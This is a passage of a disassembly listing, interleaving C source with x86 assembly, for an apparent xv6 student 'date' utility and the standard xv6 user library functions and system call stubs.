00 je a18 <particular_day+0x168> int y=0; int m=0; int d=0; for(int i=0;i<4;i++) { y += (*(x+i) - '0')*power(10,3-i); 918: 0f be 03 movsbl (%ebx),%eax 91b: 0f be 53 01 movsbl 0x1(%ebx),%edx 91f: bf 0a 00 00 00 mov $0xa,%edi 924: 83 e8 30 sub $0x30,%eax 927: 83 ea 30 sub $0x30,%edx 92a: 69 c0 e8 03 00 00 imul $0x3e8,%eax,%eax 930: 6b d2 64 imul $0x64,%edx,%edx 933: 8d 34 02 lea (%edx,%eax,1),%esi 936: 0f be 43 02 movsbl 0x2(%ebx),%eax 93a: 83 e8 30 sub $0x30,%eax 93d: f7 ef imul %edi 93f: 0f be 53 03 movsbl 0x3(%ebx),%edx 943: 01 f0 add %esi,%eax 945: 8d 74 10 d0 lea -0x30(%eax,%edx,1),%esi } for(int i=5;i<7;i++) { m += (*(x+i) - '0')*power(10,6-i); 949: 0f be c1 movsbl %cl,%eax 94c: 0f be 4d e3 movsbl -0x1d(%ebp),%ecx 950: 83 e8 30 sub $0x30,%eax 953: f7 ef imul %edi 955: 83 e9 30 sub $0x30,%ecx 958: 01 c1 add %eax,%ecx } for(int i=8;i<10;i++) { d += (*(x+i) - '0')*power(10,9-i); 95a: 0f be 45 e4 movsbl -0x1c(%ebp),%eax 95e: 83 e8 30 sub $0x30,%eax 961: f7 ef imul %edi 963: 0f be 7d e2 movsbl -0x1e(%ebp),%edi 967: 83 ef 30 sub $0x30,%edi 96a: 01 c7 add %eax,%edi } if((m>12)||(d>31)||(m<1)||(d<1)||(y<1970)) 96c: 8d 41 ff lea -0x1(%ecx),%eax 96f: 83 f8 0b cmp $0xb,%eax 972: 8d 47 ff lea -0x1(%edi),%eax 975: 0f 97 c2 seta %dl 978: 83 f8 1e cmp $0x1e,%eax 97b: 0f 97 c0 seta %al 97e: 08 c2 or %al,%dl 980: 0f 85 92 00 00 00 jne a18 <particular_day+0x168> 986: 81 fe b1 07 00 00 cmp $0x7b1,%esi 98c: 0f 8e 86 00 00 00 jle a18 <particular_day+0x168> printf(1,"date: invalid date %s\n",x); exit(); } else if(m==2) { if(d>28) 992: 83 f9 02 cmp $0x2,%ecx 995: 75 05 jne 99c <particular_day+0xec> 997: 83 ff 1c cmp $0x1c,%edi 99a: 7f 54 jg 9f0 <particular_day+0x140> printf(1,"date: invalid date %s\n",x); exit(); } } } day_name(y,m,d); 99c: 83 ec 04 sub $0x4,%esp 99f: 89 4d e4 mov %ecx,-0x1c(%ebp) 9a2: 57 push %edi 9a3: 51 push %ecx 9a4: 56 push %esi 9a5: e8 16 f9 ff ff call 2c0 <day_name> month_name(m); 9aa: 8b 4d e4 mov -0x1c(%ebp),%ecx 9ad: 89 0c 24 mov %ecx,(%esp) 9b0: e8 cb f7 ff ff call 180 <month_name> printf(1," %d",d); 9b5: 83 c4 0c add $0xc,%esp 9b8: 57 push %edi 9b9: 68 c8 12 00 00 push $0x12c8 9be: 6a 01 push $0x1 9c0: e8 3b 05 00 00 call f00 <printf> printf(1," 00:00:00 IST"); 9c5: 58 pop %eax 9c6: 5a pop %edx 9c7: 68 e8 12 00 00 push $0x12e8 9cc: 6a 01 push $0x1 9ce: e8 2d 05 00 00 call f00 <printf> printf(1," %d\n",y); 9d3: 83 c4 0c add $0xc,%esp 9d6: 56 push %esi 9d7: 68 cc 12 00 00 push $0x12cc 9dc: 6a 01 push $0x1 9de: e8 1d 05 00 00 call f00 <printf> } 9e3: 83 c4 10 add $0x10,%esp 9e6: 8d 65 f4 lea -0xc(%ebp),%esp 9e9: 5b pop %ebx 9ea: 5e pop %esi 9eb: 5f pop %edi 9ec: 5d pop %ebp 9ed: c3 ret 9ee: 66 90 xchg %ax,%ax if(x%400==0) 9f0: 89 f0 mov %esi,%eax 9f2: ba 1f 85 eb 51 mov $0x51eb851f,%edx 9f7: f7 ea imul %edx 9f9: 89 f0 mov %esi,%eax 9fb: c1 f8 1f sar $0x1f,%eax 9fe: c1 fa 07 sar $0x7,%edx a01: 29 c2 sub %eax,%edx a03: 69 c2 90 01 00 00 imul $0x190,%edx,%eax a09: 39 c6 cmp %eax,%esi a0b: 75 33 jne a40 <particular_day+0x190> if(d>29) a0d: 83 ff 1d cmp $0x1d,%edi a10: 74 8a je 99c <particular_day+0xec> a12: 8d b6 00 00 00 00 lea 0x0(%esi),%esi printf(1,"date: invalid date %s\n",x); a18: 83 ec 04 sub $0x4,%esp a1b: 53 push %ebx a1c: 68 d1 12 00 00 push $0x12d1 a21: 6a 01 push $0x1 a23: e8 d8 04 00 00 call f00 <printf> exit(); a28: e8 75 03 00 00 call da2 <exit> a2d: 8d 76 00 lea 0x0(%esi),%esi flag = 0; a30: 31 f6 xor %esi,%esi a32: e9 9e fe ff ff jmp 8d5 <particular_day+0x25> a37: 89 f6 mov %esi,%esi a39: 8d bc 27 00 00 00 00 lea 0x0(%edi,%eiz,1),%edi a40: 89 f0 mov %esi,%eax a42: 89 4d e4 mov %ecx,-0x1c(%ebp) a45: e8 46 f6 ff ff call 90 <check_leap.part.0> if(check_leap(y)) a4a: 85 c0 test %eax,%eax a4c: 8b 4d e4 mov -0x1c(%ebp),%ecx a4f: 74 c7 je a18 <particular_day+0x168> if(d>29) a51: 83 ff 1d cmp $0x1d,%edi a54: 0f 84 42 ff ff ff je 99c <particular_day+0xec> a5a: eb bc jmp a18 <particular_day+0x168> a5c: 8d 74 26 00 lea 0x0(%esi,%eiz,1),%esi 00000a60 <utc_day>: // this function prints today's date and current time (UTC format) void utc_day() { a60: 55 push %ebp a61: 89 e5 mov %esp,%ebp a63: 83 ec 34 sub $0x34,%esp struct rtcdate r; if (date(&r)) a66: 8d 45 e0 lea -0x20(%ebp),%eax a69: 50 push %eax a6a: e8 db 03 00 00 call e4a <date> a6f: 83 c4 10 add $0x10,%esp a72: 85 c0 test %eax,%eax a74: 75 68 jne ade <utc_day+0x7e> { printf(2, "date failed\n"); exit(); } day_name(r.year,r.month,r.day); // prints the name of today's day of the week a76: 83 ec 04 sub $0x4,%esp a79: ff 75 ec pushl -0x14(%ebp) a7c: ff 75 f0 pushl -0x10(%ebp) a7f: ff 75 f4 pushl -0xc(%ebp) a82: e8 39 f8 ff ff call 2c0 <day_name> month_name(r.month); // prints the name of the today's month of the year a87: 58 pop %eax a88: ff 75 f0 pushl -0x10(%ebp) a8b: e8 f0 f6 ff ff call 180 <month_name> printf(1," %d",r.day); // prints today's date a90: 83 c4 0c add $0xc,%esp a93: ff 75 ec pushl -0x14(%ebp) a96: 68 c8 12 00 00 push $0x12c8 a9b: 6a 01 push $0x1 a9d: e8 5e 04 00 00 call f00 <printf> printf(1," %d:%d:%d",r.hour,r.minute,r.second); // prints the current time (UTC format) aa2: 5a pop %edx aa3: ff 75 e0 pushl -0x20(%ebp) aa6: ff 75 e4 pushl -0x1c(%ebp) aa9: ff 75 e8 pushl -0x18(%ebp) aac: 68 be 12 00 00 push $0x12be ab1: 6a 01 push $0x1 ab3: e8 48 04 00 00 call f00 <printf> printf(1," UTC"); ab8: 83 c4 18 add $0x18,%esp abb: 68 f6 12 00 00 push $0x12f6 ac0: 6a 01 push $0x1 ac2: e8 39 04 00 00 call f00 <printf> printf(1," %d\n",r.year); // prints current year ac7: 83 c4 0c add $0xc,%esp aca: ff 75 f4 pushl -0xc(%ebp) acd: 68 cc 12 00 00 push $0x12cc ad2: 6a 01 push $0x1 ad4: e8 27 04 00 00 call f00 <printf> } ad9: 83 c4 10 add $0x10,%esp adc: c9 leave add: c3 ret printf(2, "date failed\n"); ade: 51 push %ecx adf: 51 push %ecx ae0: 68 b1 12 00 00 push $0x12b1 ae5: 6a 02 push $0x2 ae7: e8 14 04 00 00 call f00 <printf> exit(); aec: e8 b1 02 00 00 call da2 <exit> af1: eb 0d jmp b00 <day> af3: 90 nop af4: 90 nop af5: 90 nop af6: 90 nop af7: 90 nop af8: 90 nop af9: 90 nop afa: 90 nop afb: 90 nop afc: 90 nop afd: 90 nop afe: 90 nop aff: 90 nop 00000b00 <day>: // this function checks which option is chosen by user // it then calls a suitable function to implement that option void day(char *x) { b00: 55 push %ebp b01: 89 e5 mov %esp,%ebp b03: 8b 55 08 mov 0x8(%ebp),%edx switch(*(x)) b06: 0f b6 02 movzbl (%edx),%eax b09: 3c 74 cmp $0x74,%al b0b: 74 33 je b40 <day+0x40> b0d: 7e 11 jle b20 <day+0x20> b0f: 3c 77 cmp $0x77,%al b11: 74 11 je b24 <day+0x24> b13: 3c 79 cmp $0x79,%al b15: 75 19 jne b30 <day+0x30> case 'y':yesterday(); break; default:particular_day(x); break; } } b17: 5d pop %ebp case 'y':yesterday(); b18: e9 f3 f9 ff ff jmp 510 <yesterday> b1d: 8d 76 00 lea 0x0(%esi),%esi switch(*(x)) b20: 3c 64 cmp $0x64,%al b22: 75 0c jne b30 <day+0x30> } b24: 5d pop %ebp case 'w':today(); b25: e9 96 fb ff ff jmp 6c0 <today> b2a: 8d b6 00 00 00 00 lea 0x0(%esi),%esi default:particular_day(x); b30: 89 55 08 mov %edx,0x8(%ebp) } b33: 5d pop %ebp default:particular_day(x); b34: e9 77 fd ff ff jmp 8b0 <particular_day> b39: 8d b4 26 00 00 00 00 lea 0x0(%esi,%eiz,1),%esi } b40: 5d pop %ebp case 't':tomorrow(); b41: e9 fa fb ff ff jmp 740 <tomorrow> b46: 66 90 xchg %ax,%ax b48: 66 90 xchg %ax,%ax b4a: 66 90 xchg %ax,%ax b4c: 66 90 xchg %ax,%ax b4e: 66 90 xchg %ax,%ax 00000b50 <strcpy>: #include "user.h" #include "x86.h" char* strcpy(char *s, const char *t) { b50: 55 push %ebp b51: 89 e5 mov %esp,%ebp b53: 53 push %ebx b54: 8b 45 08 mov 0x8(%ebp),%eax b57: 8b 4d 0c mov 0xc(%ebp),%ecx char *os; os = s; while((*s++ = *t++) != 0) b5a: 89 c2 mov %eax,%edx b5c: 8d 74 26 00 lea 0x0(%esi,%eiz,1),%esi b60: 83 c1 01 add $0x1,%ecx b63: 0f b6 59 ff movzbl -0x1(%ecx),%ebx b67: 83 c2 01 add $0x1,%edx b6a: 84 db test %bl,%bl b6c: 88 5a ff mov %bl,-0x1(%edx) b6f: 75 ef jne b60 <strcpy+0x10> ; return os; } b71: 5b pop %ebx b72: 5d pop %ebp b73: c3 ret b74: 8d b6 00 00 00 00 lea 0x0(%esi),%esi b7a: 8d bf 00 00 00 00 lea 0x0(%edi),%edi 00000b80 <strcmp>: int strcmp(const char *p, const char *q) { b80: 55 push %ebp b81: 89 e5 mov %esp,%ebp b83: 53 push %ebx b84: 8b 55 08 mov 0x8(%ebp),%edx b87: 8b 4d 0c mov 0xc(%ebp),%ecx while(*p && *p == *q) b8a: 0f b6 02 movzbl (%edx),%eax b8d: 0f b6 19 movzbl (%ecx),%ebx b90: 84 c0 test %al,%al b92: 75 1c jne bb0 <strcmp+0x30> b94: eb 2a jmp bc0 <strcmp+0x40> b96: 8d 76 00 lea 0x0(%esi),%esi b99: 8d bc 27 00 00 00 00 lea 0x0(%edi,%eiz,1),%edi p++, q++; ba0: 83 c2 01 add $0x1,%edx while(*p && *p == *q) ba3: 0f b6 02 movzbl (%edx),%eax p++, q++; ba6: 83 c1 01 add $0x1,%ecx ba9: 0f b6 19 movzbl (%ecx),%ebx while(*p && *p == *q) bac: 84 c0 test %al,%al bae: 74 10 je bc0 <strcmp+0x40> bb0: 38 d8 cmp %bl,%al bb2: 74 ec je ba0 <strcmp+0x20> return (uchar)*p - (uchar)*q; bb4: 29 d8 sub %ebx,%eax } bb6: 5b pop %ebx bb7: 5d pop %ebp bb8: c3 ret bb9: 8d b4 26 00 00 00 00 lea 0x0(%esi,%eiz,1),%esi bc0: 31 c0 xor %eax,%eax return (uchar)*p - (uchar)*q; bc2: 29 d8 sub %ebx,%eax } bc4: 5b pop %ebx bc5: 5d pop %ebp bc6: c3 ret bc7: 89 f6 mov %esi,%esi bc9: 8d bc 27 00 00 00 00 lea 0x0(%edi,%eiz,1),%edi 00000bd0 <strlen>: uint strlen(const char *s) { bd0: 55 push %ebp bd1: 89 e5 mov %esp,%ebp bd3: 8b 4d 08 mov 0x8(%ebp),%ecx int n; for(n = 0; s[n]; n++) bd6: 80 39 00 cmpb $0x0,(%ecx) bd9: 74 15 je bf0 <strlen+0x20> bdb: 31 d2 xor %edx,%edx bdd: 8d 76 00 lea 0x0(%esi),%esi be0: 83 c2 01 add $0x1,%edx be3: 80 3c 11 00 cmpb $0x0,(%ecx,%edx,1) be7: 89 d0 mov %edx,%eax be9: 75 f5 jne be0 <strlen+0x10> ; return n; } beb: 5d pop %ebp bec: c3 ret bed: 8d 76 00 lea 0x0(%esi),%esi for(n = 0; s[n]; n++) bf0: 31 c0 xor %eax,%eax } bf2: 5d pop %ebp bf3: c3 ret bf4: 8d b6 00 00 00 00 lea 0x0(%esi),%esi bfa: 8d bf 00 00 00 00 lea 0x0(%edi),%edi 00000c00 <memset>: void* memset(void *dst, int c, uint n) { c00: 55 push %ebp c01: 89 e5 mov %esp,%ebp c03: 57 push %edi c04: 8b 55 08 mov 0x8(%ebp),%edx } static inline void stosb(void *addr, int data, int cnt) { asm volatile("cld; rep stosb" : c07: 8b 4d 10 mov 0x10(%ebp),%ecx c0a: 8b 45 0c mov 0xc(%ebp),%eax c0d: 89 d7 mov %edx,%edi c0f: fc cld c10: f3 aa rep stos %al,%es:(%edi) stosb(dst, c, n); return dst; } c12: 89 d0 mov %edx,%eax c14: 5f pop %edi c15: 5d pop %ebp c16: c3 ret c17: 89 f6 mov %esi,%esi c19: 8d bc 27 00 00 00 00 lea 0x0(%edi,%eiz,1),%edi 00000c20 <strchr>: char* strchr(const char *s, char c) { c20: 55 push %ebp c21: 89 e5 mov %esp,%ebp c23: 53 push %ebx c24: 8b 45 08 mov 0x8(%ebp),%eax c27: 8b 5d 0c mov 0xc(%ebp),%ebx for(; *s; s++) c2a: 0f b6 10 movzbl (%eax),%edx c2d: 84 d2 test %dl,%dl c2f: 74 1d je c4e <strchr+0x2e> if(*s == c) c31: 38 d3 cmp %dl,%bl c33: 89 d9 mov %ebx,%ecx c35: 75 0d jne c44 <strchr+0x24> c37: eb 17 jmp c50 <strchr+0x30> c39: 8d b4 26 00 00 00 00 lea 0x0(%esi,%eiz,1),%esi c40: 38 ca cmp %cl,%dl c42: 74 0c je c50 <strchr+0x30> for(; *s; s++) c44: 83 c0 01 add $0x1,%eax c47: 0f b6 10 movzbl (%eax),%edx c4a: 84 d2 test %dl,%dl c4c: 75 f2 jne c40 <strchr+0x20> return (char*)s; return 0; c4e: 31 c0 xor %eax,%eax } c50: 5b pop %ebx c51: 5d pop %ebp c52: c3 ret c53: 8d b6 00 00 00 00 lea 0x0(%esi),%esi c59: 8d bc 27 00 00 00 00 lea 0x0(%edi,%eiz,1),%edi 00000c60 <gets>: char* gets(char *buf, int max) { c60: 55 push %ebp c61: 89 e5 mov %esp,%ebp c63: 57 push %edi c64: 56 push %esi c65: 53 push %ebx int i, cc; char c; for(i=0; i+1 < max; ){ c66: 31 f6 xor %esi,%esi c68: 89 f3 mov %esi,%ebx { c6a: 83 ec 1c sub $0x1c,%esp c6d: 8b 7d 08 mov 0x8(%ebp),%edi for(i=0; i+1 < max; ){ c70: eb 2f jmp ca1 <gets+0x41> c72: 8d b6 00 00 00 00 lea 0x0(%esi),%esi cc = read(0, &c, 1); c78: 8d 45 e7 lea -0x19(%ebp),%eax c7b: 83 ec 04 sub $0x4,%esp c7e: 6a 01 push $0x1 c80: 50 push %eax c81: 6a 00 push $0x0 c83: e8 32 01 00 00 call dba <read> if(cc < 1) c88: 83 c4 10 add $0x10,%esp c8b: 85 c0 test %eax,%eax c8d: 7e 1c jle cab <gets+0x4b> break; buf[i++] = c; c8f: 0f b6 45 e7 movzbl -0x19(%ebp),%eax c93: 83 c7 01 add $0x1,%edi c96: 88 47 ff mov %al,-0x1(%edi) if(c == '\n' || c == '\r') c99: 3c 0a cmp $0xa,%al c9b: 74 23 je cc0 <gets+0x60> c9d: 3c 0d cmp $0xd,%al c9f: 74 1f je cc0 <gets+0x60> for(i=0; i+1 < max; ){ ca1: 83 c3 01 add $0x1,%ebx ca4: 3b 5d 0c cmp 0xc(%ebp),%ebx ca7: 89 fe mov %edi,%esi ca9: 7c cd jl c78 <gets+0x18> cab: 89 f3 mov %esi,%ebx break; } buf[i] = '\0'; return buf; } cad: 8b 45 08 mov 0x8(%ebp),%eax buf[i] = '\0'; cb0: c6 03 00 movb $0x0,(%ebx) } cb3: 8d 65 f4 lea -0xc(%ebp),%esp cb6: 5b pop %ebx cb7: 5e pop %esi cb8: 5f pop %edi cb9: 5d pop %ebp cba: c3 ret cbb: 90 nop cbc: 8d 74 26 00 lea 0x0(%esi,%eiz,1),%esi cc0: 8b 75 08 mov 0x8(%ebp),%esi cc3: 8b 45 08 mov 0x8(%ebp),%eax cc6: 01 de add %ebx,%esi cc8: 89 f3 mov %esi,%ebx buf[i] = '\0'; cca: c6 03 00 movb $0x0,(%ebx) } ccd: 8d 65 f4 lea -0xc(%ebp),%esp cd0: 5b pop %ebx cd1: 5e pop %esi cd2: 5f pop %edi cd3: 5d pop %ebp cd4: c3 ret cd5: 8d 74 26 00 lea 0x0(%esi,%eiz,1),%esi cd9: 8d bc 27 00 00 00 00 lea 0x0(%edi,%eiz,1),%edi 00000ce0 <stat>: int stat(const char *n, struct stat *st) { ce0: 55 push %ebp ce1: 89 e5 mov %esp,%ebp ce3: 56 push %esi ce4: 53 push %ebx int fd; int r; fd = open(n, O_RDONLY); ce5: 83 ec 08 sub $0x8,%esp ce8: 6a 00 push $0x0 cea: ff 75 08 pushl 0x8(%ebp) ced: e8 f0 00 00 00 call de2 <open> if(fd < 0) cf2: 83 c4 10 add $0x10,%esp cf5: 85 c0 test %eax,%eax cf7: 78 27 js d20 <stat+0x40> return -1; r = fstat(fd, st); cf9: 83 ec 08 sub $0x8,%esp cfc: ff 75 0c pushl 0xc(%ebp) cff: 89 c3 mov %eax,%ebx d01: 50 push %eax d02: e8 f3 00 00 00 call dfa <fstat> close(fd); d07: 89 1c 24 mov %ebx,(%esp) r = fstat(fd, st); d0a: 89 c6 mov %eax,%esi close(fd); d0c: e8 b9 00 00 00 call dca <close> return r; d11: 83 c4 10 add $0x10,%esp } d14: 8d 65 f8 lea -0x8(%ebp),%esp d17: 89 f0 mov %esi,%eax d19: 5b pop %ebx d1a: 5e pop %esi d1b: 5d pop %ebp d1c: c3 ret d1d: 8d 76 00 lea 0x0(%esi),%esi return -1; d20: be ff ff ff ff mov $0xffffffff,%esi d25: eb ed jmp d14 <stat+0x34> d27: 89 f6 mov %esi,%esi d29: 8d bc 27 00 00 00 00 lea 0x0(%edi,%eiz,1),%edi 00000d30 <atoi>: int atoi(const char *s) { d30: 55 push %ebp d31: 89 e5 mov %esp,%ebp d33: 53 push %ebx d34: 8b 4d 08 mov 0x8(%ebp),%ecx int n; n = 0; while('0' <= *s && *s <= '9') d37: 0f be 11 movsbl (%ecx),%edx d3a: 8d 42 d0 lea -0x30(%edx),%eax d3d: 3c 09 cmp $0x9,%al n = 0; d3f: b8 00 00 00 00 mov $0x0,%eax while('0' <= *s && *s <= '9') d44: 77 1f ja d65 <atoi+0x35> d46: 8d 76 00 lea 0x0(%esi),%esi d49: 8d bc 27 00 00 00 00 lea 0x0(%edi,%eiz,1),%edi n = n*10 + *s++ - '0'; d50: 8d 04 80 lea (%eax,%eax,4),%eax d53: 83 c1 01 add $0x1,%ecx d56: 8d 44 42 d0 lea -0x30(%edx,%eax,2),%eax while('0' <= *s && *s <= '9') d5a: 0f be 11 movsbl (%ecx),%edx d5d: 8d 5a d0 lea -0x30(%edx),%ebx d60: 80 fb 09 cmp $0x9,%bl d63: 76 eb jbe d50 <atoi+0x20> return n; } d65: 5b pop %ebx d66: 5d pop %ebp d67: c3 ret d68: 90 nop d69: 8d b4 26 00 00 00 00 lea 0x0(%esi,%eiz,1),%esi 00000d70 <memmove>: void* memmove(void *vdst, const void *vsrc, int n) { d70: 55 push %ebp d71: 89 e5 mov %esp,%ebp d73: 56 push %esi d74: 53 push %ebx d75: 8b 5d 10 mov 0x10(%ebp),%ebx d78: 8b 45 08 mov 0x8(%ebp),%eax d7b: 8b 75 0c mov 0xc(%ebp),%esi char *dst; const char *src; dst = vdst; src = vsrc; while(n-- > 0) d7e: 85 db test %ebx,%ebx d80: 7e 14 jle d96 <memmove+0x26> d82: 31 d2 xor %edx,%edx d84: 8d 74 26 00 lea 0x0(%esi,%eiz,1),%esi *dst++ = *src++; d88: 0f b6 0c 16 movzbl (%esi,%edx,1),%ecx d8c: 88 0c 10 mov %cl,(%eax,%edx,1) d8f: 83 c2 01 add $0x1,%edx while(n-- > 0) d92: 39 d3 cmp %edx,%ebx d94: 75 f2 jne d88 <memmove+0x18> return vdst; } d96: 5b pop %ebx d97: 5e pop %esi d98: 5d pop %ebp d99: c3 ret 00000d9a <fork>: name: \ movl $SYS_ ## name, %eax; \ int $T_SYSCALL; \ ret SYSCALL(fork) d9a: b8 01 00 00 00 mov $0x1,%eax d9f: cd 40 int $0x40 da1: c3 ret 00000da2 <exit>: SYSCALL(exit) da2: b8 02 00 00 00 mov $0x2,%eax da7: cd 40 int $0x40 da9: c3 ret 00000daa <wait>: SYSCALL(wait) daa: b8 03 00 00 00 mov $0x3,%eax daf: cd 40 int $0x40 db1: c3 ret 00000db2 <pipe>: SYSCALL(pipe) db2: b8 04 00 00 00 mov $0x4,%eax db7: cd 40 int $0x40 db9: c3 ret 00000dba <read>: SYSCALL(read) dba: b8 05 00 00 00 mov $0x5,%eax dbf: cd 40 int $0x40 dc1: c3 ret 00000dc2 <write>: SYSCALL(write) dc2: b8 10 00 00 00 mov $0x10,%eax dc7: cd 40 int $0x40 dc9: c3 ret 00000dca <close>: SYSCALL(close) dca: b8 15 00 00 00 mov $0x15,%eax dcf: cd 40 int $0x40 dd1: c3 ret 00000dd2 <kill>: SYSCALL(kill) dd2: b8 06 00 00 00 mov $0x6,%eax dd7: cd 40 int $0x40 dd9: c3 ret 00000dda <exec>: SYSCALL(exec) dda: b8 07 00 00 00 mov $0x7,%eax ddf: cd 40 int $0x40 de1: c3 ret 00000de2 <open>: SYSCALL(open) de2: b8 0f 00 00 00 mov $0xf,%eax de7: cd 40 int $0x40 de9: c3 ret 00000dea <mknod>: SYSCALL(mknod) dea: b8 11 00 00 00 mov $0x11,%eax def: cd 40 int $0x40 df1: c3 ret 00000df2 <unlink>: SYSCALL(unlink) df2: b8 12 00 00 00 mov $0x12,%eax df7: cd 40 int $0x40 df9: c3 ret 00000dfa <fstat>: SYSCALL(fstat) dfa: b8 08 00 00 00 mov $0x8,%eax dff: cd 40 int $0x40 e01: c3 ret 00000e02 <link>: SYSCALL(link) e02: b8 13 00 00 00 mov $0x13,%eax e07: cd 40 int $0x40 e09: c3 ret 00000e0a <mkdir>: SYSCALL(mkdir) e0a: b8 14 00 00 00 mov $0x14,%eax e0f: cd 40 int $0x40 e11: c3 ret 00000e12 <chdir>: SYSCALL(chdir) e12: b8 09 00 00 00 mov $0x9,%eax e17: cd 40 int $0x40 e19: c3 ret 00000e1a <dup>: SYSCALL(dup) e1a: b8 0a 00 00 00 mov $0xa,%eax e1f: cd 40 int $0x40 e21: c3 ret 00000e22 <getpid>: SYSCALL(getpid) e22: b8 0b 00 00 00 mov $0xb,%eax e27: cd 40 int $0x40 e29: c3 ret 00000e2a <sbrk>: SYSCALL(sbrk) e2a: b8 0c 00 00 00 mov $0xc,%eax e2f: cd 40 int $0x40 e31: c3 ret 00000e32 <sleep>: SYSCALL(sleep) e32: b8 0d 00 00 00 mov $0xd,%eax e37: cd 40 int $0x40 e39: c3 ret 00000e3a <uptime>: SYSCALL(uptime) e3a: b8 0e 00 00 00 mov $0xe,%eax e3f: cd 40 int $0x40 e41: c3 ret 00000e42 <shutdown>: SYSCALL(shutdown) e42: b8 16 00 00 00 mov $0x16,%eax e47: cd 40 int $0x40 e49: c3 ret 00000e4a <date>: SYSCALL(date) e4a: b8 17 00 00 00 mov $0x17,%eax e4f: cd 40 int $0x40 e51: c3 ret 00000e52 <cps>: SYSCALL(cps) e52: b8 18 00 00 00 mov $0x18,%eax e57: cd 40 int $0x40 e59: c3 ret e5a: 66 90 xchg %ax,%ax e5c: 66 90 xchg %ax,%ax e5e: 66 90 xchg %ax,%ax 00000e60 <printint>: write(fd, &c, 1); } static void printint(int fd, int xx, int base, int sgn) { e60: 55 push %ebp e61: 89 e5 mov %esp,%ebp e63: 57 push %edi e64: 56 push %esi e65: 53 push %ebx e66: 83 ec 3c sub $0x3c,%esp char buf[16]; int i, neg; uint x; neg = 0; if(sgn && xx < 0){ e69: 85 d2 test %edx,%edx { e6b: 89 45 c0 mov %eax,-0x40(%ebp) neg = 1; x = -xx; e6e: 89 d0 mov %edx,%eax if(sgn && xx < 0){ e70: 79 76 jns ee8 <printint+0x88> e72: f6 45 08 01 testb $0x1,0x8(%ebp) e76: 74 70 je ee8 <printint+0x88> x = -xx; e78: f7 d8 neg %eax neg = 1; e7a: c7 45 c4 01 00 00 00 movl $0x1,-0x3c(%ebp) } else { x = xx; } i = 0; e81: 31 f6 xor %esi,%esi e83: 8d 5d d7 lea -0x29(%ebp),%ebx e86: eb 0a jmp e92 <printint+0x32> e88: 90 nop e89: 8d b4 26 00 00 00 00 lea 0x0(%esi,%eiz,1),%esi do{ buf[i++] = digits[x % base]; e90: 89 fe mov %edi,%esi e92: 31 d2 xor %edx,%edx e94: 8d 7e 01 lea 0x1(%esi),%edi e97: f7 f1 div %ecx e99: 0f b6 92 80 13 00 00 movzbl 0x1380(%edx),%edx }while((x /= base) != 0); ea0: 85 c0 test %eax,%eax buf[i++] = digits[x % base]; ea2: 88 14 3b mov %dl,(%ebx,%edi,1) }while((x /= base) != 0); ea5: 75 e9 jne e90 <printint+0x30> if(neg) ea7: 8b 45 c4 mov -0x3c(%ebp),%eax eaa: 85 c0 test %eax,%eax eac: 74 08 je eb6 <printint+0x56> buf[i++] = '-'; eae: c6 44 3d d8 2d movb $0x2d,-0x28(%ebp,%edi,1) eb3: 8d 7e 02 lea 0x2(%esi),%edi eb6: 8d 74 3d d7 lea -0x29(%ebp,%edi,1),%esi eba: 8b 7d c0 mov -0x40(%ebp),%edi ebd: 8d 76 00 lea 0x0(%esi),%esi ec0: 0f b6 06 movzbl (%esi),%eax write(fd, &c, 1); ec3: 83 ec 04 sub $0x4,%esp ec6: 83 ee 01 sub $0x1,%esi ec9: 6a 01 push $0x1 ecb: 53 push %ebx ecc: 57 push %edi ecd: 88 45 d7 mov %al,-0x29(%ebp) ed0: e8 ed fe ff ff call dc2 <write> while(--i >= 0) ed5: 83 c4 10 add $0x10,%esp ed8: 39 de cmp %ebx,%esi eda: 75 e4 jne ec0 <printint+0x60> putc(fd, buf[i]); } edc: 8d 65 f4 lea -0xc(%ebp),%esp edf: 5b pop %ebx ee0: 5e pop %esi ee1: 5f pop %edi ee2: 5d pop %ebp ee3: c3 ret ee4: 8d 74 26 00 lea 0x0(%esi,%eiz,1),%esi neg = 0; ee8: c7 45 c4 00 00 00 00 movl $0x0,-0x3c(%ebp) eef: eb 90 jmp e81 <printint+0x21> ef1: eb 0d jmp f00 <printf> ef3: 90 nop ef4: 90 nop ef5: 90 nop ef6: 90 nop ef7: 90 nop ef8: 90 nop ef9: 90 nop efa: 90 nop efb: 90 nop efc: 90 nop efd: 90 nop efe: 90 nop eff: 90 nop 00000f00 <printf>: // Print to the given fd. Only understands %d, %x, %p, %s. void printf(int fd, const char *fmt, ...) { f00: 55 push %ebp f01: 89 e5 mov %esp,%ebp f03: 57 push %edi f04: 56 push %esi f05: 53 push %ebx f06: 83 ec 2c sub $0x2c,%esp int c, i, state; uint *ap; state = 0; ap = (uint*)(void*)&fmt + 1; for(i = 0; fmt[i]; i++){ f09: 8b 75 0c mov 0xc(%ebp),%esi f0c: 0f b6 1e movzbl (%esi),%ebx f0f: 84 db test %bl,%bl f11: 0f 84 b3 00 00 00 je fca <printf+0xca> ap = (uint*)(void*)&fmt + 1; f17: 8d 45 10 lea 0x10(%ebp),%eax f1a: 83 c6 01 add $0x1,%esi state = 0; f1d: 31 ff xor %edi,%edi ap = (uint*)(void*)&fmt + 1; f1f: 89 45 d4 mov %eax,-0x2c(%ebp) f22: eb 2f jmp f53 <printf+0x53> f24: 8d 74 26 00 lea 0x0(%esi,%eiz,1),%esi c = fmt[i] & 0xff; if(state == 0){ if(c == '%'){ f28: 83 f8 25 cmp $0x25,%eax f2b: 0f 84 a7 00 00 00 je fd8 <printf+0xd8> write(fd, &c, 1); f31: 8d 45 e2 lea -0x1e(%ebp),%eax f34: 83 ec 04 sub $0x4,%esp f37: 88 5d e2 mov %bl,-0x1e(%ebp) f3a: 6a 01 push $0x1 f3c: 50 push %eax f3d: ff 75 08 pushl 0x8(%ebp) f40: e8 7d fe ff ff call dc2 <write> f45: 83 c4 10 add $0x10,%esp f48: 83 c6 01 add $0x1,%esi for(i = 0; fmt[i]; i++){ f4b: 0f b6 5e ff movzbl -0x1(%esi),%ebx f4f: 84 db test %bl,%bl f51: 74 77 je fca <printf+0xca> if(state == 0){ f53: 85 ff test %edi,%edi c = fmt[i] & 0xff; f55: 0f be cb movsbl %bl,%ecx f58: 0f b6 c3 movzbl %bl,%eax if(state == 0){ f5b: 74 cb je f28 <printf+0x28> state = '%'; } else { putc(fd, c); } } else if(state == '%'){ f5d: 83 ff 25 cmp $0x25,%edi f60: 75 e6 jne f48 <printf+0x48> if(c == 'd'){ f62: 83 f8 64 cmp $0x64,%eax f65: 0f 84 05 01 00 00 je 1070 <printf+0x170> printint(fd, *ap, 10, 1); ap++; } else if(c == 'x' || c == 